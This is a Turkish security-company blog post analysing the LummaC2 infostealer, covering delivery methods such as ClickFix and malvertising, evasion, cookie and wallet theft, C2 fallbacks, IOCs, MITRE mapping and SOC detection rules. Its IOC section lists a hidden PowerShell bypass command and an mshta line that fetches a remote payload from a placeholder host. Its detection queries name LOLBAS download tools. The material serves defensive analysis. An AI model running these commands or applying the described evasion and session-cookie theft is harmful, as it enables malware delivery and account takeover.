Ana Sayfa Çözümler Hizmetler Çözüm Ortakları Neden Netsmart? Kariyer Keşif İletişim

Netsmart Bilişim Sistemleri A.Ş.

Esentepe Mh. Ecza Sk. No: 6 K: 1, 34394,
Şişli-İstanbul, Türkiye

+90212-274-31-61

[email protected]

LummaC2

LummaC2 Infostealer: 2025’in En Tehlikeli Siber Tehdidinin Anatomisi

1. Neden Infostealer'lar 2025'in En Büyük Tehdidi?

Siber tehdit dünyası 2025 yılında köklü bir dönüşüm geçirdi. Fidye yazılımları (ransomware) hâlâ gündemde olsa da asıl sahneyi infostealer’lar — yani bilgi hırsızı yazılımlar — ele geçirdi. Bu yazılımların bu denli tehlikeli hale gelmesinin temel nedeni, çok faktörlü doğrulamayı (MFA) devre dışı bırakabilme yetenekleridir. Kullanıcı adı ve şifre çalmak artık yetmiyor; modern infostealer’lar doğrudan tarayıcıdan oturum çerezlerini (session token) çalarak kullanıcının aktif oturumuna MFA adımını atlatarak sızabiliyor.

Rakamlar durumun ciddiyetini gözler önüne seriyor:

  • 16 Milyar Kimlik Bilgisi: Haziran 2025’te Cybernews araştırmacıları tarafından saptanan sızıntı, dünya nüfusunun yaklaşık iki katına denk gelen kullanıcı verisini — şifre, e-posta, oturum çerezleri — açığa çıkardı.
  • 1,8 Milyar Kurumsal Kimlik Bilgisi: Yalnızca infostealer yazılımları üzerinden bu kadar kimlik bilgisi doğrudan kullanıcı cihazlarından çekildi.
  • Etkilenen Platformlar: Apple, Google, Facebook, Telegram ve birçok devlet kurumuna ait kullanıcı giriş bilgileri bu sızıntıların bir parçası oldu.

Infostealer’lar tek başına bir tehdit olmakla kalmıyor; çalınan veriler dark web’de satılarak fidye yazılımı saldırıları, BEC (Business Email Compromise) ve kripto para dolandırıcılıkları için zemin hazırlıyor. Bu zincirin en güçlü halkalarından biri ise LummaC2’dir.

2. LummaC2'nin Tarihçesi

LummaC2 (Lumma Stealer), C diliyle yazılmış, Malware-as-a-Service (MaaS) modeliyle dağıtılan en tehlikeli infostealer yazılımlarından biridir. Kripto cüzdanları, tarayıcı çerezleri ve 2FA uygulamalarını hedef alan bu yazılımın 2022’den günümüze uzanan tarihçesi şu şekildedir:

Doğuşu ve Pazara Giriş (2022–2023)

  • Ağustos 2022: Yazılım, Rusça konuşulan siber suç forumlarında ve Telegram’da ilk kez göründü. “Shamel” takma adını kullanan “Lumma” isimli bir tehdit aktörü tarafından geliştirildiği tespit edildi.
  • MaaS Modeli: Aylık 250 dolardan başlayan aboneliklerle siber suçlulara kiralanmaya başlandı. Teknik bilgisi sınırlı kişilerin bile panel kiralayıp saldırı düzenleyebilmesi, yazılımın dark web’de hızla yayılmasını sağladı.

Yükseliş ve Teknik Evrim (2023–2024)

  • Rakiplerin Boşluğunu Doldurma: RedLine ve Meta Stealer gibi dönemin büyük infostealer ailelerine yönelik operasyonlar gerçekleştirilince LummaC2, siber suçluların yeni favorisi haline geldi.
  • ClickFix ve Sahte CAPTCHA: Yazılım, bulaşma yöntemlerini modernize etti. Sahte Cloudflare CAPTCHA sayfaları aracılığıyla kullanıcılara farkında olmadan PowerShell komutları çalıştırtıldı.
  • Gelişmiş Kaçış Teknikleri: Anti-sandbox için fare hareketi simülasyonu zorunluluğu ve antivirüs tespitini atlatmak için direct syscall kullanımı entegre edildi.

Zirve Noktası (2024–2025 Başı)

  • %369 Artış: ESET raporlarına göre LummaC2 kullanımı 2024 yılında %369 oranında arttı.
  • Kurumsal Odak: Bireysel kullanıcıların yanı sıra şirket oturum çerezleri ve kripto cüzdan uzantıları da hedef alınmaya başlandı.

Küresel Takedown Operasyonu (Mayıs 2025)

  • Dev Operasyon: Microsoft Dijital Suçlar Birimi (DCU), FBI, ABD Adalet Bakanlığı (DOJ) ve Europol ortaklığında tarihin en büyük siber operasyonlarından biri düzenlendi.
  • Altyapının Çökertilmesi: 2.300’den fazla domain ele geçirildi, 90’dan fazla Telegram kanalı kapatıldı. Operasyon sürecinde 394.000’den fazla Windows cihazının LummaC2 tarafından enfekte edildiği ortaya çıktı.

Günümüz (2025 Sonu–2026)

Takedown operasyonu LummaC2’ye ağır bir darbe vurdu ancak tehdit tamamen ortadan kalkmadı. Geliştiriciler kod tabanını değiştirerek ve EtherHiding gibi blockchain tabanlı altyapıya geçerek yeni sürümler (v4.0+) üretmeye devam ediyor. Enfeksiyon sayıları operasyon öncesi seviyelere geri dönüyor.

3. Initial Access

LummaC2, kurban cihazlarına ilk erişimi sağlamak için sosyal mühendislik ve teknik aldatmacayı bir arada kullanan dört temel vektöre dayanır.

Phishing (Oltalama)

Kurumsal hedeflere yönelik spear-phishing veya sahte fatura/kargo bildirimleri biçiminde yürütülür.

  • Yöntem: “Ödenmemiş Fatura”, “Hukuki İhtar” veya “İK Güncellemesi” gibi aciliyet yaratan e-postalar gönderilir.
  • Payload Teslimi: E-posta ekinde doğrudan .exe yer almaz. Bunun yerine makro içeren sahte Office belgeleri, şifreli ZIP dosyaları veya kötü amaçlı indirme sitesine yönlendiren linkler kullanılır.
  • Sosyal Mühendislik: E-posta içeriği kurumsal dille yazılır; kurban genellikle antivirüsü devre dışı bırakması yönünde manipüle edilir.

Fake CAPTCHA — ClickFix

LummaC2’nin son yıllardaki en inovatif vektörlerinden biridir.

  • Yöntem: Kullanıcı sahte bir web sitesine girdiğinde karşısına sahte Cloudflare veya Google CAPTCHA ekranı çıkar.
  • Aldatmaca: Sayfa kullanıcıdan şu adımları yapmasını ister: Windows + R Ctrl + V Enter.
  • Arka Plan: Kullanıcı farkında olmadan panoya önceden kopyalanmış zararlı bir PowerShell komutunu kendi eliyle çalıştırır. Bu komut, LummaC2’yi uzak sunucudan indirip saniyeler içinde kurar.

Malvertising (Zararlı Reklamcılık)

Google Ads ve Bing Ads sistemleri istismar edilerek meşru yazılımlar taklit edilir.

  • Yöntem: Kullanıcı “AnyDesk download”, “WinRAR” veya “Zoom” gibi popüler yazılımları arama motorunda aradığında, en üstte sponsorlu reklam olarak sahte siteler görünür.
  • Klon Siteler: Reklam linkine tıklandığında, orijinalin birebir kopyası olan bir alan adına (örn. anydesk-download[.]download) gidilir.
  • Sonuç: Kullanıcı resmi yazılımı indirdiğini sanırken LummaC2 gizlenmiş trojanize yükleyiciyi çalıştırır.

Fake Crack / Loader (Sahte Crack ve Hile Yazılımları)

Oyuncuları ve yazılım kullanıcılarını hedef alan klasik ama etkili bir yöntem.

  • Yöntem: YouTube açıklamalarında, GitHub depolarında veya warez forumlarında popüler oyun hileleri (GTA, Valorant) veya “Adobe Photoshop Crack”, “KMSPico” gibi sahte araçlar paylaşılır.
  • Loader Mekanizması: İndirilen dosya şifreli bir .zip/.rar içindedir. Kullanıcı çalıştırdığında arka planda bir loader devreye girer.
  • Enjeksiyon: Loader, Windows Defender’ı kapatır ve LummaC2 kodunu regasm.exe veya explorer.exe gibi meşru Windows süreçlerine enjekte eder.

4. Execution Chain

LummaC2 kurban cihazına düştükten sonra beş adımlı bir execution zinciri izler:

Adım 1 — İlk Tetikleyici: Kullanıcı zararlı dosyayı çalıştırır. Dosya .exe, .msi, .lnk veya doğrudan PowerShell scripti formatında gelebilir.

Adım 2 — Loader Aşaması: Ana payload hemen çalışmaz. Önce bir loader devreye girer; Windows Defender’ı devre dışı bırakır, execution policy’yi değiştirir ve asıl LummaC2 payload’ını bellekte çalıştırır. Disk üzerinde iz bırakmamak için reflective DLL injection veya process hollowing teknikleri kullanılır.

Adım 3 — Anti-Sandbox Kontrolleri: LummaC2 çalışmadan önce ortamı analiz eder:

  • Fare hareketi var mı? (Sandbox ortamlarında genellikle yoktur)
  • RAM 2 GB’ın üzerinde mi?
  • Kullanıcı adı “sandbox”, “maltest”, “admin” gibi bilinen analiz ortamı isimlerine benziyor mu?
  • VMware veya VirtualBox registry kayıtları mevcut mu?

Kontroller geçilirse execution devam eder, geçilemezse process kendini sonlandırır.

Adım 4 — Memory Injection: LummaC2 kodu explorer.exe, regasm.exe veya svchost.exe gibi meşru bir Windows sürecine enjekte edilir. Task Manager’da zararlı bir process görünmez.

Adım 5 — Veri Toplama Başlar: Bellek enjeksiyonu tamamlanınca credential theft mekanizması devreye girer.

5. Persistence ve Defense Evasion

Kalıcılık Mekanizmaları

LummaC2, sistem yeniden başlatıldıktan sonra da aktif kalmak için birden fazla yöntem kullanır:

  • Registry Run Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run anahtarına kendini ekleyerek her açılışta otomatik çalışır.
  • Scheduled Task: Belirli aralıklarla tetiklenen zamanlanmış görev oluşturur.
  • Startup Klasörü: Kısayol dosyası bırakır.

Tespitten Kaçınma Teknikleri

  • Kod Obfüskasyonu: String’ler şifreli tutulur, runtime’da decrypt edilir — statik analizde zararlı string’ler görünmez.
  • Direct Syscalls: Windows API’lerini bypass ederek doğrudan kernel çağrısı yapar; EDR hook’larını atlar.
  • Living-off-the-Land: certutil, bitsadmin, mshta gibi meşru Windows araçları payload indirmek ve çalıştırmak için kullanılır — beyaz listedeki araçlar şüphe çekmez.
  • Anti-Debug: Debugger attach edildiğinde process kendini kapatır veya sahte veri döner.
  • EtherHiding: Binance Smart Chain üzerindeki smart contract’lara C2 adresleri yazılır — blockchain’deki veriyi silmek mümkün olmadığından domain bloklama işe yaramaz.

6. Credential Theft Mekanizması

LummaC2’nin asıl amacı bu bölümde netleşiyor. Üç ana hedef kategorisi vardır:

Tarayıcı Verisi

Chrome, Edge, Firefox, Brave gibi tarayıcıların SQLite veritabanlarına erişir (Login Data, Cookies, Web Data dosyaları). Chrome’un DPAPI ile şifrelediği verileri, mevcut kullanıcı oturumunu kullanarak decrypt eder — kullanıcı giriş yapmışsa şifreler açık metin olarak okunabilir.

Session Token Hırsızlığı MFA Bypass

En kritik nokta burasıdır. Kullanıcı bir siteye giriş yapıp MFA’yı geçtikten sonra tarayıcıda oturum çerezi (session cookie) oluşur. LummaC2 bu çerezi çalarsa saldırgan, MFA adımı olmadan doğrudan o oturuma girer. Google, Microsoft 365, Slack ve GitHub gibi kurumsal platformlar bu yöntemle ele geçirilir.

Kripto Cüzdanlar

MetaMask, Exodus, Electrum, Ledger Live gibi tarayıcı uzantıları ve masaüstü uygulamalarının wallet dosyalarını hedef alır; seed phrase ve private key dosyalarını arar.

Sistem Bilgisi Toplama

IP adresi, işletim sistemi versiyonu, yüklü yazılım listesi ve ekran görüntüsü alınır. Tüm bu veriler C2’ye gönderilecek System.txt dosyasına yazılır.

7. C2 İletişimi

LummaC2’nin komuta-kontrol altyapısı katmanlı ve dirençli olarak tasarlanmıştır.

Birincil İletişim

Malware içine hardcoded domain listesi gömülüdür. Bu domainler genellikle .shop, .ru, .su uzantılı rastgele isimler içerir. Tüm trafik Cloudflare üzerinden geçer; IP bloklama etkisiz kalır.

Fallback Mekanizması

Birincil domainler erişilemez olursa sıradaki yöntemler devreye girer:

  • Telegram Kanalları: Kanal açıklamasına güncel C2 adresi yazılır.
  • Steam Profil Sayfaları: Profil biyografisine C2 adresi gizlenir.
  • EtherHiding: Binance Smart Chain smart contract’larına C2 adresi işlenir — bloklanması teknik olarak mümkün değildir.

Veri Sızdırma

Toplanan veriler .zip olarak sıkıştırılır, HTTPS üzerinden C2’ye gönderilir. Operatör, web panelinden çalınan kimlik bilgilerine gerçek zamanlı erişebilir.

8. IOC Örnekleri

Aşağıdaki göstergeler LummaC2 kampanyalarında tespit edilen örnek değerlerdir:

Domain Örüntüleri

  • .shop uzantılı rastgele isimli domainler (örn. xtra-load[.]shop, bestforum[.]shop)
  • Cloudflare arkasına gizlenmiş C2 domainleri

User-Agent String

  • TeslaBrowser — LummaC2 C2 iletişiminde kullanılan karakteristik User-Agent değeri

Dosya Sistemi Artifact’ları

  • %APPDATA%\Roaming\ altında rastgele isimli klasörler
  • System.txt — exfiltration öncesi toplanan sistem bilgisinin yazıldığı dosya
  • .scif uzantılı dosyalar

PowerShell Komut Örüntüleri

powershell -WindowStyle hidden -ExecutionPolicy Bypass -Command “[Net.ServicePointManager]…”

mshta http://[domain]/[payload]

Hash Örnekleri (ANY.RUN ve VirusTotal Üzerinden Doğrulanabilir)

Güncel hash değerleri için: https://any.run LummaC2 etiketi ile arama yapılabilir.

9. MITRE ATT&CK Eşlemesi

TaktikTeknikID
Initial AccessPhishingT1566
Initial AccessDrive-by Compromise (Malvertising)T1189
ExecutionPowerShellT1059.001
ExecutionUser Execution (Fake CAPTCHA)T1204
PersistenceRegistry Run KeysT1547.001
PersistenceScheduled TaskT1053.005
Defense EvasionObfuscated Files or InformationT1027
Defense EvasionProcess InjectionT1055
Defense EvasionMasquerading (LOLBAS)T1036
Defense EvasionVirtualization/Sandbox EvasionT1497
Credential AccessCredentials from Web BrowsersT1555.003
Credential AccessSteal Web Session CookieT1539
CollectionClipboard DataT1115
Command & ControlWeb Service (Telegram/Steam)T1102
Command & ControlEncrypted ChannelT1573
ExfiltrationExfiltration Over C2 ChannelT1041

Kaynak: MITRE ATT&CK — Lumma Stealer (S1213)

10. SOC Ekipleri Neye Dikkat Etmeli?

Tespit Kuralları (Detection)

PowerShell Anomalileri:

process_name = “powershell.exe” AND (command_line contains “ExecutionPolicy Bypass” OR command_line contains “WindowStyle Hidden” OR command_line contains “Net.ServicePointManager”)

LOLBAS Kullanımı:

process_name IN (“mshta.exe”, “certutil.exe”, “bitsadmin.exe”) AND network_connection = true

Şüpheli Process Enjeksiyonu:

parent_process = “explorer.exe” AND child_process IN (“regasm.exe”, “svchost.exe”) AND network_connection = true

C2 Trafik Örüntüsü:

  • .shop uzantılı domainlere giden HTTP/HTTPS trafiği
  • TeslaBrowser User-Agent içeren istekler
  • Cloudflare IP aralıklarından gelen alışılmadık callback’ler

Proaktif Önlemler

  • Tarayıcı Cookie Kısıtlaması: Session cookie’lerin HttpOnly ve Secure flag’leriyle korunması
  • MFA Dayanıklılığı: Token tabanlı MFA yerine FIDO2/hardware key tercih edilmesi — session cookie hırsızlığına karşı dirençlidir
  • Uç Nokta Koruması: EDR çözümlerinde memory injection ve LOLBAS detection kurallarının aktif edilmesi
  • Kullanıcı Farkındalığı: ClickFix saldırılarına özel simülasyon — kullanıcılara CAPTCHA sayfasının Windows + R kombinasyonu istemeyeceğinin anlatılması
  • Tehdit İstihbaratı: LummaC2 IOC’lerinin (özellikle .shop domainleri ve TeslaBrowser UA) SIEM/SOAR’a beslenmesi

Olay Müdahalesi

LummaC2 tespiti durumunda öncelikli aksiyonlar:

  1. Enfekte sistemi ağdan derhal izole et
  2. Tüm tarayıcı oturumlarını kapat, aktif session token’ları geçersiz kıl
  3. Kurumsal platformlarda (M365, Google Workspace, Slack) şifre sıfırlama zorla
  4. Credential dump için %APPDATA% ve %TEMP% dizinlerini incele
  5. SIEM’de lateral movement işaretlerini retrohunt et

Kaynakça

  1. Microsoft Threat Intelligence Blog — Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer (Mayıs 2025) — microsoft.com/security/blog
  2. Microsoft On the Issues — Disrupting Lumma Stealer: Microsoft leads global action (Mayıs 2025) — blogs.microsoft.com
  3. CISA/FBI Ortak Tavsiyesi — AA25-141B: LummaC2 Malware (Mayıs 2025) — cisa.gov
  4. Red Canary Threat Detection Report — LummaC2 (2026) — redcanary.com
  5. SOCRadar — Disrupting Lumma Stealer Malware (Mayıs 2025) — socradar.io
  6. CybelAngel — What is LummaC2 Stealer? — cybelangel.com
  7. WardenShield — LummaC2 Malware Analysis 2025 — wardenshield.com
  8. SecurityScientist — 12 Questions and Answers About LummaC2 — securityscientist.net
  9. MITRE ATT&CK — Lumma Stealer S1213 — attack.mitre.org
  10. Cybernews — 16 Billion Credentials Leak (Haziran 2025) — cybernews.com

Selim Oğuz Şahin

 - 21 Temmuz 2026, Salı

Kuantum Tehdidine Karşı Güvenlikte Yeni Çağ: Post-Quantum Kriptografi ve Yol Haritası

Analiz

Kuantum bilgisayarlar, klasik bilgisayarların ötesine geçen hesaplama yetenekleriyle, modern kriptografi altyapılarını tehdit eden yeni bir dönemi beraberinde getirmektedir.

Daha fazla

Entrust nShield ve Thales Protect Server HSM’ler ile Zabbix (SNMP) ve Splunk (Syslog) Entegrasyonu ve İzleme

Analiz

Güvenliğe dayalı altyapılarda kullanılan Hardware Security Module (HSM) cihazları, kriptografik anahtarların güvenli bir şekilde depolanması ve işlenmesi için kritik öneme sahiptir.

Daha fazla
SIEM Projelerinde WEF’in Faydaları ve WEF Konfigürasyonu

SIEM Projelerinde WEF’in Faydaları ve WEF Konfigürasyonu

Konfigürasyon

Windows Event Forwarding, Windows tabanlı sistemlerde yerel olarak desteklenen günlük merkezileştirme özellikleri sağlar. Microsoft, sunucular üzerindeki logların tek bir yerde toplanması WEF mimarisi ile sağlamaktadır.

Daha fazla

Veri Koruma Günü

Analiz

Veri Koruma Günü, her yıl 28 Ocak’ta, kişisel verilerin korunması ve veri gizliliği konusunda farkındalık yaratmak amacıyla belirlenmiş bir gündür.

Daha fazla